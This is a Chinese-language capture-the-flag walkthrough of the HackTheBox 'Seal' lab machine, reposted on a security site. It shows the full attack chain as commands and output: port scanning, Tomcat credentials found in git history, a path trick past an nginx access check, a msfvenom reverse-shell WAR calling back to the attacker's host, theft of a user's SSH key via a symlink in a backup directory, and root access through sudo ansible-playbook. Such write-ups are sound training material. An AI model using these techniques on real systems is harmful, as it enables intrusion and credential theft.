HackTheBox-Seal

admin 2022年9月8日15:18:03安全文章评论4 views15065字阅读50分13秒阅读模式

title: HackTheBox-Seal author: CrazyInSide layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Seal.png tags:

Linux


Seal
CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.250Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-09-01 10:04:57 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 8080/tcp on 10.10.10.250                                  Discovered open port 443/tcp on 10.10.10.250                                   Discovered open port 22/tcp on 10.10.10.250                                                                                                                                                                                                                              CrazyInSide:~/HackTheBox$ sudo nmap -sC -sV 10.10.10.250 -p8080,443,22                     Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-09-01 18:09 CSTNmap scan report for 10.10.10.250Host is up (0.083s latency).PORT     STATE SERVICE    VERSION22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 4b894739673d07315e3f4c27411ff967 (RSA)|   256 04a74f399565c5b08dd5492ed8440036 (ECDSA)|_  256 b45e8393c54249de7125927123b18554 (ED25519)443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)| tls-alpn: |_  http/1.1|_http-server-header: nginx/1.18.0 (Ubuntu)| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK| Not valid before: 2021-05-05T10:24:03|_Not valid after:  2022-05-05T10:24:03|_http-title: Seal Market|_ssl-date: TLS randomness does not represent time| tls-nextprotoneg: |_  http/1.18080/tcp open  http-proxy| http-auth: | HTTP/1.1 401 Unauthorizedx0D|_  Server returned status 401 but no WWW-Authenticate header.|_http-title: Site doesn't have a title (text/html;charset=utf-8).| fingerprint-strings: |   FourOhFourRequest: |     HTTP/1.1 401 Unauthorized|     Date: Thu, 01 Sep 2022 10:10:04 GMT|     Set-Cookie: JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2.node0; Path=/; HttpOnly|     Expires: Thu, 01 Jan 1970 00:00:00 GMT|     Content-Type: text/html;charset=utf-8|     Content-Length: 0|   GetRequest: |     HTTP/1.1 401 Unauthorized|     Date: Thu, 01 Sep 2022 10:10:03 GMT|     Set-Cookie: JSESSIONID=node0yvbmr291moot13csk9lwzfixi0.node0; Path=/; HttpOnly|     Expires: Thu, 01 Jan 1970 00:00:00 GMT|     Content-Type: text/html;charset=utf-8|     Content-Length: 0|   HTTPOptions: |     HTTP/1.1 200 OK|     Date: Thu, 01 Sep 2022 10:10:04 GMT|     Set-Cookie: JSESSIONID=node01jub9w55x03xg1mawzh2zjn5sd1.node0; Path=/; HttpOnly|     Expires: Thu, 01 Jan 1970 00:00:00 GMT|     Content-Type: text/html;charset=utf-8|     Allow: GET,HEAD,POST,OPTIONS|     Content-Length: 0|   RPCCheck: |     HTTP/1.1 400 Illegal character OTEXT=0x80|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 71|     Connection: close|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>|   RTSPRequest: |     HTTP/1.1 505 Unknown Version|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 58|     Connection: close|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>|   Socks4: |     HTTP/1.1 400 Illegal character CNTL=0x4|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 69|     Connection: close|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>|   Socks5: |     HTTP/1.1 400 Illegal character CNTL=0x5|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 69|     Connection: close|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://ParrotOS.org/cgi-bin/submit.cgi?new-service :SF-Port8080-TCP:V=7.92SVN%I=7%D=9/1%Time=631084FB%P=x86_64-unknown-linux-gSF:nu%r(GetRequest,F4,"HTTP/1.1x20401x20UnauthorizedrnDate:x20Thu,xSF:2001x20Sepx202022x2010:10:03x20GMTrnSet-Cookie:x20JSESSIONID=nodSF:e0yvbmr291moot13csk9lwzfixi0.node0;x20Path=/;x20HttpOnlyrnExpires:SF:x20Thu,x2001x20Janx201970x2000:00:00x20GMTrnContent-Type:x20teSF:xt/html;charset=utf-8rnContent-Length:x200rnrn")%r(HTTPOptions,1SF:09,"HTTP/1.1x20200x20OKrnDate:x20Thu,x2001x20Sepx202022x2010:SF:10:04x20GMTrnSet-Cookie:x20JSESSIONID=node01jub9w55x03xg1mawzh2zjn5SF:sd1.node0;x20Path=/;x20HttpOnlyrnExpires:x20Thu,x2001x20Janx20SF:1970x2000:00:00x20GMTrnContent-Type:x20text/html;charset=utf-8rnSF:Allow:x20GET,HEAD,POST,OPTIONSrnContent-Length:x200rnrn")%r(RTSSF:PRequest,AD,"HTTP/1.1x20505x20Unknownx20VersionrnContent-Type:x2SF:0text/html;charset=iso-8859-1rnContent-Length:x2058rnConnection:xSF:20closernrn<h1>Badx20Messagex20505</h1><pre>reason:x20Unknownx2SF:0Version</pre>")%r(FourOhFourRequest,F4,"HTTP/1.1x20401x20UnauthorizSF:edrnDate:x20Thu,x2001x20Sepx202022x2010:10:04x20GMTrnSet-CookSF:ie:x20JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2.node0;x20Path=/;x2SF:0HttpOnlyrnExpires:x20Thu,x2001x20Janx201970x2000:00:00x20GMTrSF:nContent-Type:x20text/html;charset=utf-8rnContent-Length:x200rnSF:rn")%r(Socks5,C3,"HTTP/1.1x20400x20Illegalx20characterx20CNTL=0x5SF:rnContent-Type:x20text/html;charset=iso-8859-1rnContent-Length:x2SF:069rnConnection:x20closernrn<h1>Badx20Messagex20400</h1><pre>rSF:eason:x20Illegalx20characterx20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1SF:.1x20400x20Illegalx20characterx20CNTL=0x4rnContent-Type:x20text/SF:html;charset=iso-8859-1rnContent-Length:x2069rnConnection:x20closSF:ernrn<h1>Badx20Messagex20400</h1><pre>reason:x20Illegalx20charaSF:cterx20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1.1x20400x20Illegalx20SF:characterx20OTEXT=0x80rnContent-Type:x20text/html;charset=iso-8859-SF:1rnContent-Length:x2071rnConnection:x20closernrn<h1>Badx20MeSF:ssagex20400</h1><pre>reason:x20Illegalx20characterx20OTEXT=0x80</prSF:e>");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 40.34 secondszsh: segmentation fault  sudo nmap -sC -sV 10.10.10.250 -p8080,443,22
image-20220901184128109

这里有一个搜索框,但搜索框似乎调用的GoogleMap.8080端口有一个GitBucket

image-20220901185129058

这应用有个历史漏洞:

CrazyInSide:~/HackTheBox$ searchsploit GitBucket------------------------------------------------------------------------------------ --------------------------------- Exploit Title                                                                      |  Path------------------------------------------------------------------------------------ ---------------------------------GitBucket 4.23.1 - Remote Code Execution                                            | java/webapps/44668.py------------------------------------------------------------------------------------ ---------------------------------Shellcodes: No ResultsPapers: No Results

但是该漏洞文档说明仅在windows服务器上才有效。尝试注册了一个账户,目标可能部署了tomcat,在tomcat历史提交中,能够找到一组账号密码。

image-20220901195541259
username="tomcat" password="42MrHBf*z8{Z%"

我开始对80端口进行目录枚举:

CrazyInSide:~/HackTheBox$ dirsearch -u https://seal.htb/    _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/crazyinside/.dirsearch/reports/seal.htb/-_22-09-01_18-51-03.txtError Log: /home/crazyinside/.dirsearch/logs/errors-22-09-01_18-51-03.logTarget: https://seal.htb/[18:51:04] Starting: [18:51:05] 302 -    0B  - /js  ->  http://seal.htb/js/[18:51:31] 400 -  804B  - /..................etcpasswd[18:51:33] 400 -  804B  - /a%5c.aspx[18:51:36] 302 -    0B  - /admin  ->  http://seal.htb/admin/[18:52:05] 302 -    0B  - /css  ->  http://seal.htb/css/[18:52:15] 403 -  564B  - /host-manager/html[18:52:16] 302 -    0B  - /host-manager/  ->  http://seal.htb/host-manager/html[18:52:16] 302 -    0B  - /icon  ->  http://seal.htb/icon/[18:52:16] 302 -    0B  - /images  ->  http://seal.htb/images/[18:52:18] 200 -   19KB - /index.html[18:52:26] 302 -    0B  - /manager  ->  http://seal.htb/manager/[18:52:26] 403 -  564B  - /manager/html[18:52:26] 302 -    0B  - /manager/  ->  http://seal.htb/manager/html[18:52:26] 403 -  564B  - /manager/html/[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage[18:52:26] 401 -    2KB - /manager/jmxproxy[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY[18:52:26] 401 -    2KB - /manager/status/all[18:52:26] 401 -    2KB - /manager/jmxproxy/?qry=STUFF[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERSTask Completed

似乎该站点运行着tomcat,因为tomcat默认目录就是http://seal.htb/manager/html。但是为什么是http?我开始翻阅nginx配置文件:

image-20220901200109508

似乎这些需要客户端提供一个证书,如果我通过了认证会代理到目标8000端口。路径其实好绕,它只检测/manager/html。我只需要访问/manager;/html即可,然后输入刚刚找到的tomcat凭证即可:

image-20220901200513434

tomcat生成war包一键部署即可:

CrazyInSide:~/HackTheBox$ msfvenom -p java/shell_reverse_tcp lhost=10.10.16.6 lport=1337 -f war -o test.warPayload size: 13316 bytesFinal size of war file: 13316 bytesSaved as: test.warCrazyInSide:~/HackTheBox$ nc -lvnp 1337listening on [any] 1337 ...connect to [10.10.16.6] from (UNKNOWN) [10.10.10.250] 43076iduid=997(tomcat) gid=997(tomcat) groups=997(tomcat)script -qc /bin/bash /dev/null[email protected]:/var/lib/tomcat9$ 

在opt目录有一个备份文件夹:

[email protected]:/opt/backups$ lsarchives  playbook[email protected]:/opt/backups$ cd archives/[email protected]:/opt/backups/archives$ lsbackup-2022-09-01-12:30:32.gz  backup-2022-09-01-12:31:33.gz[email protected]:/opt/backups/archives$ cat ../playbook/run.yml - hosts: localhost  tasks:  - name: Copy Files    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes  - name: Server Backups    archive:      path: /opt/backups/files/      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"  - name: Clean    file:      state: absent      path: /opt/backups/files/[email protected]:/opt/backups/archives$ 

似乎每过一会儿变会有计划任务将/var/lib/tomcat9/webapps/ROOT/admin/dashboard备份归档到backup。

[email protected]:/opt/backups/archives$ ls -alltotal 2968drwxrwxr-x 2 luis luis   4096 Sep  1 12:34 .drwxr-xr-x 4 luis luis   4096 Sep  1 12:34 ..-rw-rw-r-- 1 luis luis 606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:31 backup-2022-09-01-12:31:33.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:32 backup-2022-09-01-12:32:33.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:33 backup-2022-09-01-12:33:33.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:34 backup-2022-09-01-12:34:33.gz[email protected]:/opt/backups/archives$ 

它所属于luis用户,而uploads目录可读可写可执行:

[email protected]:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -alltotal 100drwxr-xr-x 7 root root  4096 May  7  2021 .drwxr-xr-x 3 root root  4096 May  6  2021 ..drwxr-xr-x 5 root root  4096 Mar  7  2015 bootstrapdrwxr-xr-x 2 root root  4096 Mar  7  2015 cssdrwxr-xr-x 4 root root  4096 Mar  7  2015 images-rw-r--r-- 1 root root 71744 May  6  2021 index.htmldrwxr-xr-x 4 root root  4096 Mar  7  2015 scriptsdrwxrwxrwx 2 root root  4096 May  7  2021 uploads[email protected]:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ln -s /home/luis /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

将其链接向luis用户目录。过会儿有一个非常大的备份:

[email protected]:/opt/backups/archives$ ls -alltotal 113612drwxrwxr-x 2 luis luis      4096 Sep  1 12:36 .drwxr-xr-x 4 luis luis      4096 Sep  1 12:36 ..-rw-rw-r-- 1 luis luis    606047 Sep  1 12:35 backup-2022-09-01-12:35:33.gz-rw-rw-r-- 1 luis luis 115723773 Sep  1 12:36 backup-2022-09-01-12:36:32.gz[email protected]:/opt/backups/archives$ cp backup-2022-09-01-12:36:32.gz /tmp[email protected]:/opt/backups/archives$ cd /tmp[email protected]:/tmp$ tar xf backup-2022-09-01-12:36:32.gz --force-local[email protected]:/tmp$ lsbackup-2022-09-01-12:30:32.gz  dashboard          pwk.py       tmpypck0ak1backup-2022-09-01-12:36:32.gz  hsperfdata_tomcat  tmp7e2a49nn[email protected]:/tmp$ ls -alltotal 113636drwxrwxrwt  6 root   root        4096 Sep  1 12:38 .drwxr-xr-x 20 root   root        4096 Jul 26  2021 ..-rw-r-----  1 tomcat tomcat    606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz-rw-r-----  1 tomcat tomcat 115723773 Sep  1 12:37 backup-2022-09-01-12:36:32.gzdrwxr-x---  7 tomcat tomcat      4096 May  7  2021 dashboarddrwxr-x---  2 tomcat tomcat      4096 Sep  1 10:00 hsperfdata_tomcat-rw-r-----  1 tomcat tomcat      3448 Sep  1 12:23 pwk.pydrwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmp7e2a49nndrwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmpypck0ak1[email protected]:/tmp$ cd dashboard/
[email protected]:/tmp/dashboard/uploads/luis$ ls -alltotal 51320drwxr-x--- 9 tomcat tomcat     4096 May  7  2021 .drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 ..drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .ansible-rw-r----- 1 tomcat tomcat      220 May  5  2021 .bash_logout-rw-r----- 1 tomcat tomcat     3797 May  5  2021 .bashrcdrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .cachedrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .configdrwxr-x--- 7 tomcat tomcat     4096 Sep  1 12:38 .gitbucket-rw-r----- 1 tomcat tomcat 52497951 Jan 14  2021 gitbucket.wardrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .javadrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .local-rw-r----- 1 tomcat tomcat      807 May  5  2021 .profiledrwx------ 2 tomcat tomcat     4096 Sep  1 12:38 .ssh-r-------- 1 tomcat tomcat       33 Sep  1 10:00 user.txt[email protected]:/tmp/dashboard/uploads/luis$ cat user.txt 98f4bf24..............................

有用户秘钥:

[email protected]:/tmp/dashboard/uploads/luis/.ssh$ lsauthorized_keys  id_rsa  id_rsa.pub[email protected]:/tmp/dashboard/uploads/luis/.ssh$ cat id_rsaCrazyInSide:~/HackTheBox$ ssh -i id_rsa [email protected].10.10.250    The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.10.250' (ED25519) to the list of known hosts.Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) * Documentation:  https://help.ubuntu.com * Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage  System information as of Thu 01 Sep 2022 12:41:22 PM UTC  System load:  0.29              Processes:             165  Usage of /:   49.2% of 9.58GB   Users logged in:       0  Memory usage: 30%               IPv4 address for eth0: 10.10.10.250  Swap usage:   0% * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!     https://microk8s.io/22 updates can be applied immediately.15 of these updates are standard security updates.To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.To check for new updates run: sudo apt updateLast login: Fri May  7 07:00:18 2021 from 10.10.14.2[email protected]:~$ 
[email protected]:~$ sudo -lMatching Defaults entries for luis on seal:    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser luis may run the following commands on seal:    (ALL) NOPASSWD: /usr/bin/ansible-playbook *[email protected]:~$ cat run.yml - hosts: localhost  tasks:  - name: cat    shell: cat /root/root.txt > flag.txt    register: out  - name: stdout    debug: msg=""  - name: stderr    debug: msg=""
[email protected]:~$ sudo /usr/bin/ansible-playbook run.yml [WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'PLAY [localhost] *******************************************************************************************************************************************************************************TASK [Gathering Facts] *************************************************************************************************************************************************************************ok: [localhost]TASK [cat] *************************************************************************************************************************************************************************************changed: [localhost]TASK [stdout] **********************************************************************************************************************************************************************************ok: [localhost] => {    "msg": ""}TASK [stderr] **********************************************************************************************************************************************************************************ok: [localhost] => {    "msg": ""}PLAY RECAP *************************************************************************************************************************************************************************************localhost                  : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   [email protected]:~$ lsflag.txt  gitbucket.war  run.yml  user.txt[email protected]:~$ cat flag.txt 9b0c..............................[email protected]:~$ 

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月8日15:18:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  HackTheBox-Seal http://cn-sec.com/archives/1283945.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: